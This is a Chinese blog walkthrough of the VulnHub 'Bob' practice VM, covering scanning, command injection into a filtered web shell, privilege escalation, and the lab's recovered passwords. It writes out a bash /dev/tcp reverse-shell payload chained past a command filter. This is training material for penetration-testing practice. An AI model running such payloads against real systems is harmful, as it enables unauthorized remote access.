vulnbub系列:Bob_v1.0.1

最新推荐文章于 2024-10-12 13:34:29 发布
最新推荐文章于 2024-10-12 13:34:29 发布
阅读量365 收藏 7
点赞数 4
分类专栏: vulnhub系列 文章标签: web安全 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/jq_j37/article/details/140892674
版权

vulnbub系列:Bob_v1.0.1

靶机下载

一、信息收集

nmap扫描存活,根据mac地址确定IP

nmap 192.168.23.0/24

image-20240803150357582

nmap扫描端口,开放端口80、25468,ssh端口改为了25468

nmap 192.168.23.174 -p- -sV -Pn -O

image-20240803150526511

dirb目录扫描,没啥发现,一个robots文件,看看内容

访问80端口

image-20240803150804637

到处点了点,没什么发现,查看robots.txt

image-20240803151228111

逐个拼接访问,dev_shell.php,是一个命令执行的页面

image-20240803151433753

lat_memo.html,这里提到网站有一个webshell,但是认为它是安全的

image-20240803151415824

passwords.html

image-20240803151350645

dev_shell.php页面发现存在过滤,一些命令无法执行

image-20240803152406627

执行whoami | ls,发现一个备份文件

whoami | ls

image-20240803152619653

下载下来,查看文件内容,看到过滤了一些命令

image-20240803152910663

二、getshell

直接尝试反弹shell

pwd&echo "bash -i >& /dev/tcp/192.168.23.133/4444 0>&1" | bash

成功反弹shell

image-20240803153735050

三、提权

到home目录下,查看,发现有四个用户的家目录

image-20240803154609395

先到bob目录下查看,发现一个可能存在密码的文件.old_passwordfile.html

image-20240803154716207

查看文件,得到 jc 和 seb 的密码

jc:Qwerty
seb:T1tanium_Pa$$word_Hack3rs_Fear_M3

image-20240803154831064

在 Documents 下发现一个加密的文件 login.txt.gpg 和一个目录 Secret

image-20240803155504169

在 /home/bob/Documents/Secret/Keep_Out/Not_Porn/No_Lookie_In_Here 下,发现了 notes.sh

image-20240803155827930

查看文件内容

image-20240803155918265

没看懂,网上搜了一下,是藏头诗,密钥为 HARPOCRATES

HARPOCRATES

解密 login.txt.gpg ,没有权限

gpg -d login.txt.gpg

image-20240803160136632

ssh登录其他用户尝试

ssh jc@192.168.23.174 -p 25468

image-20240803160336163

再次解密

gpg --batch --passphrase HARPOCRATES -d login.txt.gpg

image-20240803161419179

得到 bob 的密码

bob:b0bcat_

再看看 elliot 的家目录,发现一个 theadminisdumb.txt 文件

image-20240803155014775

查看内容,这里提到他把密码改为了 theadminisdumb

elliot:theadminisdumb

image-20240803155132970

ssh连接bob用户

ssh bob@192.168.23.174 -p 25468

image-20240803161913092

查看当前权限,显示为all,所有命令都可以

sudo -l

image-20240803162140163

直接sudo su,提权成功

sudo su

image-20240803162308020

三天三夜睡不着
关注
专栏目录
VulnHub渗透实战Billu_b0x
Fly_鹏程万里
06-06 7797
简介VulnHub是一个面向所有人开放的安全靶场,里面有很多安全环境,只要下载相关镜像,在相关虚拟机上面运行就可以练习相关靶场了。里面设计了好多关,如果有耐心一定可以到达峰顶。许多考oscp人员,也会利用vulnhub靶场进行刷题。我们下载了一个经典漏洞靶场,给大家进行演示,希望让初学者知道渗透测试的套路,可以更快的成长。官网:https://www.vulnhub.com/参考了一些国外设计靶场...
vulnhub靶场合集之earth靶场渗透
weixin_62297109的博客
06-03 713
最近闲来无事,搞搞vulnbub靶场玩一玩,选个简单的直接点击跳转下载就好了。
教你怎么用Vulnhub来搭建环境
大方子
09-22 2万+
0x01 前言 Vulnhub它是一个提供各种漏洞环境的平台,里面大部分的环境是要用VMware或者VirtualBox打开运行的。 如果只是练习一些常见的漏洞可以看我另外两篇用Docker来搭建各种漏洞靶场(妈妈再也不用担心我没有靶场练习了)从CentOS安装Docker来搭建漏洞靶场到Joomla 3.4.5 反序列化漏洞复现(附批量Getshell脚本) 0x02 下载 https:/...
Vulnhub入门实战-Wakanda
qq_24033605的博客
07-14 2294
下载链接 描述: 1.探测主机的IP地址 2.使用nmap查看靶机开放端口。 开放了4个端口,老样子先从http下手。 3.进去发现没什么可以点的,于是进行目录扫描。 状态码都是200,但是size为0,所以返回的都是空页面。 查看主页源代码,发现一个注释。 猜测存在本地文件包含漏洞,抓包看一下。 成功读取主页源码,并发现密码,猜测下一步根据账号和密码进行ssh登录。 账户猜测就是主页的namemamadou,passwdNiamey4Ever227!!! 这里的使用凭证是有效的,但是还
vulnhub靶场实战系列(一)之vulnhub靶场介绍
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
03-07 3084
我们在学习了各种web漏洞的原理和各种内网的攻击手法的利用之后,需要实战来提升经验,这一环节就可以有操作系统靶场平台来代替一方面因为靶场是现成的,已经搭建好的靶场,只需要下载到本地用虚拟机安装就可以了,非常省时。第二点,非常安全,我们要知道没有经过法律允许的渗透行为是犯法的,而我们使用靶场来模拟达到实战训练的目的的同时也不会触碰法律。名称描述网站vulnhub与Kali同一家公司(offsec)出品。一共有600多个镜像,可以在VMWare或者VirtualBox打开,有不同难度。
TFT35_V1.0.1_中文
05-25
TFT35_V1.0.1_中文TFT35_V1.0.1_中文TFT35_V1.0.1_中文TFT35_V1.0.1_中文TFT35_V1.0.1_中文TFT35_V1.0.1_中文TFT35_V1.0.1_中文TFT35_V1.0.1_中文TFT35_V1.0.1_中文TFT35_V1.0.1_中文TFT35_V1.0.1_中文TFT35_V1.0.1_...
DSVideo_Go_v1.0.1.apk
08-02
安装AndroidTV版的群晖官方DSVideo之后桌面上不生成图标,这个apk就是一个引导程序,安装这个apk之后,桌面上出现DSVideo的图标,点击后引导启动官方DSVideo。
stm32f3_I2C_Timing_Configuration_V1.0.1
03-31
配置stm32f3的IIC,可以通过工具设置上升沿,下降沿的时间,IIC的频率。
I2C_Timing_Configuration_V1.0.1.zip
07-03
I2C timing configuration tool for STM32F3xx and STM32F0xx microcontrollers,STM32时钟配置工具,适用于STM32F3XX和STM32F0XX系列单片机。
ZXDoc_x64_V1.0.1(20230515).exe.zip
07-12
ZXDoc_x64_V1.0.1(20230515).exe.zip 是一个压缩包文件,根据其命名格式,我们可以推断它包含的是ZXDoc软件的64位版本,版本号为1.0.1,发布日期为2023年5月15日。ZXDoc很可能是一款文档管理或者处理相关的应用程序...
Vulnhub靶机渗透测试实战(一):DC-1(入门)
热门推荐
weixin_41038469的博客
03-11 2万+
关于Vulnhub Vulnhub是一个特别好的渗透测试实战网站,提供了许多带有漏洞的渗透测试虚拟机下载。 新手入门DC-1: 下载地址: https://www.vulnhub.com/entry/dc-1-1,292/ 主机渗透系统: macOS10.13 安装好虚拟机后挂载Virtualbox运行 第一次进行渗透实战演练,打开虚拟机后发现需要登录密码,一脸懵逼。翻查网页上的介绍才知道,就是不...
渗透测试实战Vulnhub-Lampiao
weixin_44558065的博客
06-22 1678
目录 一、设计概述 1.1、渗透测试的意义 1.2、渗透测试的目的 二、需求分析 2.1、用户需求分析 2.2、渗透测试 三、方案规划与实施 3.1、信息收集 3.1.1 Nmap扫描 3.1.2 wpscan扫描 3.1.4 webdirscan目录扫描 3.2 漏洞分析 3.2.1 漏洞名称 3.2.2 漏洞概述 3.2.3 漏洞点 3.2.4 漏洞触发流程 3.2.5 漏洞利用 3.2.6 修复意见 3.3 web渗透 一、设计概述 1.1、渗透测试的意义 信息安全等级保护的要求 2015年12月2
带妹玩转Vulnhub【一】
BadRer的博客
09-27 7688
前言 题目是不想在刷了,想学一学渗透测试的知识。 由于是开头之作,所以会写的比较的详细,尽量让大家少走弯路。 带妹是不可能带妹的,这辈子都不可能带妹的
如何用3个月零基础入门网络安全?_网络安全零基础怎么学习
2401_84466224的博客
10-09 885
我们知道计算机最早是在西方发明出来的,很多名词或者代码都是英文的,甚至现有的一些教程最初也是英文原版翻译过来的,而且一个漏洞被发现到翻译成中文一般需要一个星期的时间,在这个时间差上漏洞可能都修补了。”答案是否定的,黑客用的电脑,不需要什么高的配置,只要稳定就行.因为黑客所使用的一些程序,低端CPU也可以很好的运行,而且不占什么内存.还有一个,黑客是在DOS命令下对进行的,所以电脑能使用到最佳状态!观看学习近十年所有0day挖掘的帖,然后搭建环境,去复现漏洞,去思考学习笔者的挖洞思维,培养自己的渗透思维。
2024年网络安全进阶手册:三个月黑客技术自学路线
2401_85027336的博客
10-12 551
网络安全可以基于攻击和防御视角来分类,我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。走安全行业的工程方向的,技术上面其实有很大的重叠性,抛开甲乙方、岗位名称、岗位职责等因素来看,作为学技术的,也根据以往我们给学员推荐就业和入职情况来看,只要好好掌握以下几种技术(网络协议与安全设备、Linux操作系统、Web服务部署/开发、主流渗透测试/安全工具、一门及以上的编程语言)中的2到3个,都可以较好的胜任工作需求。
网络安全(黑客技术)2024年三个月自学手册
2401_85026116的博客
10-11 1826
网络安全可以基于攻击和防御视角来分类,我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。走安全行业的工程方向的,技术上面其实有很大的重叠性,抛开甲乙方、岗位名称、岗位职责等因素来看,作为学技术的,也根据以往我们给学员推荐就业和入职情况来看,只要好好掌握以下几种技术(网络协议与安全设备、Linux操作系统、Web服务部署/开发、主流渗透测试/安全工具、一门及以上的编程语言)中的2到3个,都可以较好的胜任工作需求。
网络攻击的新趋势:勒索软件与零日漏洞
最新发布
A526847的博客
10-12 667
随着数字化技术的飞速发展网络攻击的新趋势:勒索软件与零日漏洞,网络攻击的形式也在不断演变。近年来,勒索软件和零日漏洞已成为网络攻击中的两大新趋势,给个人、企业和政府机构带来了巨大的安全威胁。本文将深入探讨这两种网络攻击手段的特点、危害以及防范措施。
hc32f030_ide_rev1.0.1
06-06
hc32f030_ide_rev1.0.1是一款集成开发环境(IDE),用于hc32f030系列单片机的开发。它由华大基础(HDP)公司开发,可用于Windows操作系统。hc32f030_ide_rev1.0.1提供了代码编辑、编译、调试等功能,支持多种编程...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值